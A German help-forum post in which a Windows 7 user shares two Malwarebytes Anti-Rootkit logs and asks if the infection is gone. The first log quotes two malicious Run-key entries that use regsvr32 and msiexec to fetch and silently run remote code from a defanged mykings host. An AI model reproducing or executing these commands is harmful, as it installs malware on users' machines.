| |
| |||||||
Log-Analyse und Auswertung: Win 7 - evtl Trojaner? Wie bereinigen?Windows 7 Wenn Du Dir einen Trojaner eingefangen hast oder ständig Viren Warnungen bekommst, kannst Du hier die Logs unserer Diagnose Tools zwecks Auswertung durch unsere Experten posten. Um Viren und Trojaner entfernen zu können, muss das infizierte System zuerst untersucht werden: Erste Schritte zur Hilfe. Beachte dass ein infiziertes System nicht vertrauenswürdig ist und bis zur vollständigen Entfernung der Malware nicht verwendet werden sollte.XML. |
 |
| |
08.05.2017, 19:41
| #1 |
 |  Win 7 - evtl Trojaner? Wie bereinigen? Hi, also, ich hab das jetzt durchgeführt. Nachdem der Rechner neu gestartet wurde, kann ich nicht mehr auf die Software mbar.exe zugreifen. Es kommt das Fenster: der angegebene Pfad ist nicht vorhanden. Überprüfen Sie die Pfandangabe und wiederholen Sie den Vorgang. Ich starte den Rechner gleich nochmal neu indem ich die F8 Taste drücke, dann sollte es eigentlich funktionieren und ich lasse es noch ein zweites Mal durchlaufen. Das Problem mit dem Pfad hab ich oft, wenn der Rechner "normal" startet.... So, hier die log Datei Code:
ATTFilter Malwarebytes Anti-Rootkit BETA 1.9.3.1001
www.malwarebytes.org
Database version:
main: v2017.05.08.06
rootkit: v2017.04.02.01
Windows 7 Service Pack 1 x64 NTFS
Internet Explorer 11.0.9600.18426
***** :: *****-PC [administrator]
08.05.2017 17:01:54
mbar-log-2017-05-08 (17-01-54).txt
Scan type: Quick scan
Scan options enabled: Anti-Rootkit | Drivers | MBR | Physical Sectors | Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken
Scan options disabled:
Objects scanned: 346873
Time elapsed: 1 hour(s), 25 minute(s), 10 second(s)
Memory Processes Detected: 0
(No malicious items detected)
Memory Modules Detected: 0
(No malicious items detected)
Registry Keys Detected: 0
(No malicious items detected)
Registry Values Detected: 2
HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|start (Trojan.Agent.Generic) -> Data: regsvr32 /u /s /i:hxxp://js.mykings.top:280/v.sct scrobj.dll -> Delete on reboot. [f9bd3fd6565369cd21a34108cd3319e7]
HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|start1 (Trojan.Agent.Generic) -> Data: msiexec.exe /i hxxp://js.mykings.top:280/helloworld.msi /q -> Delete on reboot. [f8be68ad149578bef4d75cf820e0a957]
Registry Data Items Detected: 0
(No malicious items detected)
Folders Detected: 0
(No malicious items detected)
Files Detected: 0
(No malicious items detected)
Physical Sectors Detected: 0
(No malicious items detected)
(end)
Heißt das jetzt, dass alles in Ordnung ist? In der GData Quarantäne hab ich immer noch irgendwelche vermeintlichen infizierten Dateien.... Hier die zweite log Datei Code:
ATTFilter Malwarebytes Anti-Rootkit BETA 1.9.3.1001
www.malwarebytes.org
Database version:
main: v2017.05.08.07
rootkit: v2017.04.02.01
Windows 7 Service Pack 1 x64 NTFS
Internet Explorer 11.0.9600.18426
***** :: *****-PC [administrator]
08.05.2017 19:15:27
mbar-log-2017-05-08 (19-15-27).txt
Scan type: Quick scan
Scan options enabled: Anti-Rootkit | Drivers | MBR | Physical Sectors | Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken
Scan options disabled:
Objects scanned: 346389
Time elapsed: 1 hour(s), 16 minute(s), 57 second(s)
Memory Processes Detected: 0
(No malicious items detected)
Memory Modules Detected: 0
(No malicious items detected)
Registry Keys Detected: 0
(No malicious items detected)
Registry Values Detected: 0
(No malicious items detected)
Registry Data Items Detected: 0
(No malicious items detected)
Folders Detected: 0
(No malicious items detected)
Files Detected: 0
(No malicious items detected)
Physical Sectors Detected: 0
(No malicious items detected)
(end)
|
|
| Themen zu Win 7 - evtl Trojaner? Wie bereinigen? |
| autorun, bho, blockiert, defender, error, festplatte, firefox, flash player, format, helper, home, launch, logfile, mozilla, problem, prozesse, realtek, registry, rundll, scan, senden, services.exe, trojaner, trojaner?, usb, windows |
Hybrid-Darstellung
